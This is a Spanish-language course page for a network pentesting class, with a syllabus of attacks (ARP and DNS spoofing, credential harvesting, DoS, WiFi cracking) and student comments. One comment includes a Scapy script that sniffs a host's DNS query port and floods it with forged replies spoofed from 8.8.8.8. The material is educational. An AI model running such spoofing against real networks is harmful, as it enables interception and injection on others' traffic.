El curso es excelente, tan bueno y completo que llego a perderme en varias partes. Es para repasarlo una y otra vez. El contenido sí vale la pena.
Introducción al pentesting a redes
Bienvenida y presentación de la estructura del curso
Laboratorios para el curso
Modelo de ataques
Direccionamiento dinámico
Configuración de protocolos de enrutamiento dinámico
Protocolos de enrutamiento dinámico
Configuración de enrutamiento dinámico
Configuración de segundo enrutador y verificación de tablas de enrutamiento
Configuración de NAT y redireccionamiento
Análisis de DNS
Ataques a protocolos de red
ARP Poisoning
DNS Spoofing
DHCP Spoofing
Encapsulado de paquetes con Scapy
Ataques a protocolos de enrutamiento
Verificación de ataques a protocolos de enrutamiento
Análisis de NAT
Ataque NAT Bypass
Ataques de ingeniería social
Introducción a la Ingeniería Social
Credential Harvesting
Preparación de ataques con SET y Metasploit
Ejecución de ataques con SET y Metasploit
Ataques de denegación de servicio
Modelo de un ataque DoS
Ataques ICMP y SYN Flood
Ataques Smurf y DoS con Metasploit
Ataques con LOIC
Pentesting con DoS
Ataques a redes inalámbricas
Configuración de entorno para auditoría WiFi
Monitoreo de redes WiFi
Ataque a WEP
Ataque a WPA
Conclusiones, creación de informe y bibliografía
Elaboración de informe
Despedida, bibliografía y cierre
No tienes acceso a esta clase
¡Continúa aprendiendo! Únete y comienza a potenciar tu carrera
Aportes 7
Preguntas 1
El curso es excelente, tan bueno y completo que llego a perderme en varias partes. Es para repasarlo una y otra vez. El contenido sí vale la pena.
en casi de que raw no te funciona
d = r"Esto podira ser codigo malicioso"
esto es por la versión que usa python
Se aprende muhco en cada clase.
Con el siguiente script se puede automatizar un poco el proceso:
#!/usr/bin/python3
from scapy.all import sniff, UDP, Ether, IP, sendp
port = 0
def print_summary(pkt):
global port
if pkt[UDP].sport != None:
port=pkt[UDP].sport
while port == 0:
packets = sniff(filter="dst host 8.8.8.8 and dst port 53 and src host 192.168.120.1 and udp", count=1, iface="eth0", timeout=1, prn=print_summary)
a = Ether()
b = IP(src="8.8.8.8", dst="192.168.120.1")
c = UDP(sport=53, dport=port)
d = r"Malicious payload"
packet = a/b/c/d
sendp(packet, loop=1, inter=3, iface="eth0")
Muy interesante la herramienta Scapy 🐍
Lo de raw me funciono con:
d = "Codigo malicioso"
Me quedó la duda, en que lenguaje debe estar escrito el código malicioso se puede insertar en el raw?
Los aportes, preguntas y respuestas son vitales para aprender en comunidad. Regístrate o inicia sesión para participar.